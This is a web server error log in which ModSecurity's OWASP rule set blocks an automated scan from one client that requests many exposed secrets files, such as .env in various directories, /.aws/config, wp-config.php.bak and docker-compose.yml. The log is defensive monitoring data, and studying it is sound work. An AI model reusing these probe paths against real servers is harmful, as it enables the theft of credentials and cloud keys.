[Wed Jul 23 18:17:06.741070 2025] [:error] [pid 1389900] [client 185.177.72.107:17598] [client 185.177.72.107] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /core/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/core/.env"] [unique_id "aIELAm6wfjR6tSMvn7_O2AAAAAQ"]
[Wed Jul 23 18:17:06.741315 2025] [:error] [pid 1389900] [client 185.177.72.107:17598] [client 185.177.72.107] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/core/.env"] [unique_id "aIELAm6wfjR6tSMvn7_O2AAAAAQ"]
[Wed Jul 23 18:17:06.741523 2025] [:error] [pid 1389900] [client 185.177.72.107:17598] [client 185.177.72.107] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/core/.env"] [unique_id "aIELAm6wfjR6tSMvn7_O2AAAAAQ"]
[Wed Jul 23 18:17:06.800826 2025] [:error] [pid 1389900] [client 185.177.72.107:17598] [client 185.177.72.107] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /prod/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/prod/.env"] [unique_id "aIELAm6wfjR6tSMvn7_O2gAAAAQ"]
[Wed Jul 23 18:17:06.801074 2025] [:error] [pid 1389900] [client 185.177.72.107:17598] [client 185.177.72.107] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/prod/.env"] [unique_id "aIELAm6wfjR6tSMvn7_O2gAAAAQ"]
[Wed Jul 23 18:17:06.801274 2025] [:error] [pid 1389900] [client 185.177.72.107:17598] [client 185.177.72.107] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/prod/.env"] [unique_id "aIELAm6wfjR6tSMvn7_O2gAAAAQ"]
[Wed Jul 23 18:17:06.821761 2025] [:error] [pid 1389900] [client 185.177.72.107:17598] [client 185.177.72.107] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /kyc/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/kyc/.env"] [unique_id "aIELAm6wfjR6tSMvn7_O2wAAAAQ"]
[Wed Jul 23 18:17:06.822015 2025] [:error] [pid 1389900] [client 185.177.72.107:17598] [client 185.177.72.107] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/kyc/.env"] [unique_id "aIELAm6wfjR6tSMvn7_O2wAAAAQ"]
[Wed Jul 23 18:17:06.822218 2025] [:error] [pid 1389900] [client 185.177.72.107:17598] [client 185.177.72.107] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/kyc/.env"] [unique_id "aIELAm6wfjR6tSMvn7_O2wAAAAQ"]
[Wed Jul 23 18:17:06.880776 2025] [:error] [pid 1389900] [client 185.177.72.107:17598] [client 185.177.72.107] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /laravael/core/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/laravael/core/.env"] [unique_id "aIELAm6wfjR6tSMvn7_O3QAAAAQ"]
[Wed Jul 23 18:17:06.881033 2025] [:error] [pid 1389900] [client 185.177.72.107:17598] [client 185.177.72.107] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/laravael/core/.env"] [unique_id "aIELAm6wfjR6tSMvn7_O3QAAAAQ"]
[Wed Jul 23 18:17:06.881232 2025] [:error] [pid 1389900] [client 185.177.72.107:17598] [client 185.177.72.107] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/laravael/core/.env"] [unique_id "aIELAm6wfjR6tSMvn7_O3QAAAAQ"]
[Wed Jul 23 18:17:06.940392 2025] [:error] [pid 1389900] [client 185.177.72.107:17598] [client 185.177.72.107] ModSecurity: Warning. Matched phrase ".aws/config" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: .aws/config found within REQUEST_FILENAME: /.aws/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.aws/config"] [unique_id "aIELAm6wfjR6tSMvn7_O3wAAAAQ"]
[Wed Jul 23 18:17:06.940641 2025] [:error] [pid 1389900] [client 185.177.72.107:17598] [client 185.177.72.107] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.aws/config"] [unique_id "aIELAm6wfjR6tSMvn7_O3wAAAAQ"]
[Wed Jul 23 18:17:06.940833 2025] [:error] [pid 1389900] [client 185.177.72.107:17598] [client 185.177.72.107] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.aws/config"] [unique_id "aIELAm6wfjR6tSMvn7_O3wAAAAQ"]
[Wed Jul 23 18:17:06.961336 2025] [:error] [pid 1389900] [client 185.177.72.107:17598] [client 185.177.72.107] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /docker/app/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/docker/app/.env"] [unique_id "aIELAm6wfjR6tSMvn7_O4AAAAAQ"]
[Wed Jul 23 18:17:06.961601 2025] [:error] [pid 1389900] [client 185.177.72.107:17598] [client 185.177.72.107] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/docker/app/.env"] [unique_id "aIELAm6wfjR6tSMvn7_O4AAAAAQ"]
[Wed Jul 23 18:17:06.961786 2025] [:error] [pid 1389900] [client 185.177.72.107:17598] [client 185.177.72.107] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/docker/app/.env"] [unique_id "aIELAm6wfjR6tSMvn7_O4AAAAAQ"]
[Wed Jul 23 18:17:07.021649 2025] [:error] [pid 1389900] [client 185.177.72.107:17598] [client 185.177.72.107] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.prod"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.prod"] [unique_id "aIELA26wfjR6tSMvn7_O4gAAAAQ"]
[Wed Jul 23 18:17:07.021901 2025] [:error] [pid 1389900] [client 185.177.72.107:17598] [client 185.177.72.107] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.prod"] [unique_id "aIELA26wfjR6tSMvn7_O4gAAAAQ"]
[Wed Jul 23 18:17:07.022096 2025] [:error] [pid 1389900] [client 185.177.72.107:17598] [client 185.177.72.107] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.prod"] [unique_id "aIELA26wfjR6tSMvn7_O4gAAAAQ"]
[Wed Jul 23 18:17:07.042803 2025] [authz_core:error] [pid 1389900] [client 185.177.72.107:17598] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/config
[Wed Jul 23 18:17:07.115360 2025] [:error] [pid 1389900] [client 185.177.72.107:17598] [client 185.177.72.107] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /awsstats/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/awsstats/.env"] [unique_id "aIELA26wfjR6tSMvn7_O5QAAAAQ"]
[Wed Jul 23 18:17:07.115617 2025] [:error] [pid 1389900] [client 185.177.72.107:17598] [client 185.177.72.107] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/awsstats/.env"] [unique_id "aIELA26wfjR6tSMvn7_O5QAAAAQ"]
[Wed Jul 23 18:17:07.115817 2025] [:error] [pid 1389900] [client 185.177.72.107:17598] [client 185.177.72.107] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/awsstats/.env"] [unique_id "aIELA26wfjR6tSMvn7_O5QAAAAQ"]
[Wed Jul 23 18:17:07.137737 2025] [authz_core:error] [pid 1389900] [client 185.177.72.107:17598] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/wp-config.php.bak
[Wed Jul 23 18:17:07.158791 2025] [:error] [pid 1389900] [client 185.177.72.107:17598] [client 185.177.72.107] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /admin/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/admin/.env"] [unique_id "aIELA26wfjR6tSMvn7_O5wAAAAQ"]
[Wed Jul 23 18:17:07.159051 2025] [:error] [pid 1389900] [client 185.177.72.107:17598] [client 185.177.72.107] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/admin/.env"] [unique_id "aIELA26wfjR6tSMvn7_O5wAAAAQ"]
[Wed Jul 23 18:17:07.159256 2025] [:error] [pid 1389900] [client 185.177.72.107:17598] [client 185.177.72.107] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/admin/.env"] [unique_id "aIELA26wfjR6tSMvn7_O5wAAAAQ"]
[Wed Jul 23 18:17:07.179434 2025] [authz_core:error] [pid 1389900] [client 185.177.72.107:17598] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/config
[Wed Jul 23 18:17:07.239346 2025] [:error] [pid 1389900] [client 185.177.72.107:17598] [client 185.177.72.107] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /apps/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/apps/.env"] [unique_id "aIELA26wfjR6tSMvn7_O6gAAAAQ"]
[Wed Jul 23 18:17:07.239613 2025] [:error] [pid 1389900] [client 185.177.72.107:17598] [client 185.177.72.107] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/apps/.env"] [unique_id "aIELA26wfjR6tSMvn7_O6gAAAAQ"]
[Wed Jul 23 18:17:07.239802 2025] [:error] [pid 1389900] [client 185.177.72.107:17598] [client 185.177.72.107] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/apps/.env"] [unique_id "aIELA26wfjR6tSMvn7_O6gAAAAQ"]
[Wed Jul 23 18:17:07.298242 2025] [authz_core:error] [pid 1389900] [client 185.177.72.107:17598] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/logs
[Wed Jul 23 18:17:07.319239 2025] [:error] [pid 1389900] [client 185.177.72.107:17598] [client 185.177.72.107] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /private/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/private/.env"] [unique_id "aIELA26wfjR6tSMvn7_O7QAAAAQ"]
[Wed Jul 23 18:17:07.319495 2025] [:error] [pid 1389900] [client 185.177.72.107:17598] [client 185.177.72.107] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/private/.env"] [unique_id "aIELA26wfjR6tSMvn7_O7QAAAAQ"]
[Wed Jul 23 18:17:07.319689 2025] [:error] [pid 1389900] [client 185.177.72.107:17598] [client 185.177.72.107] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/private/.env"] [unique_id "aIELA26wfjR6tSMvn7_O7QAAAAQ"]
[Wed Jul 23 18:17:07.339805 2025] [authz_core:error] [pid 1389900] [client 185.177.72.107:17598] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/docker-compose.yml
[Wed Jul 23 18:17:07.725930 2025] [:error] [pid 1389900] [client 185.177.72.107:17598] [client 185.177.72.107] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /portal/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/portal/.env"] [unique_id "aIELA26wfjR6tSMvn7_O8AAAAAQ"]
[Wed Jul 23 18:17:07.726183 2025] [:error] [pid 1389900] [client 185.177.72.107:17598] [client 185.177.72.107] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/portal/.env"] [unique_id "aIELA26wfjR6tSMvn7_O8AAAAAQ"]
[Wed Jul 23 18:17:07.726386 2025] [:error] [pid 1389900] [client 185.177.72.107:17598] [client 185.177.72.107] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/portal/.env"] [unique_id "aIELA26wfjR6tSMvn7_O8AAAAAQ"]
[Wed Jul 23 18:17:07.747205 2025] [:error] [pid 1389900] [client 185.177.72.107:17598] [client 185.177.72.107] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /env/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/env/.env"] [unique_id "aIELA26wfjR6tSMvn7_O8QAAAAQ"]
[Wed Jul 23 18:17:07.747428 2025] [:error] [pid 1389900] [client 185.177.72.107:17598] [client 185.177.72.107] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/env/.env"] [unique_id "aIELA26wfjR6tSMvn7_O8QAAAAQ"]
[Wed Jul 23 18:17:07.747592 2025] [:error] [pid 1389900] [client 185.177.72.107:17598] [client 185.177.72.107] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/env/.env"] [unique_id "aIELA26wfjR6tSMvn7_O8QAAAAQ"]
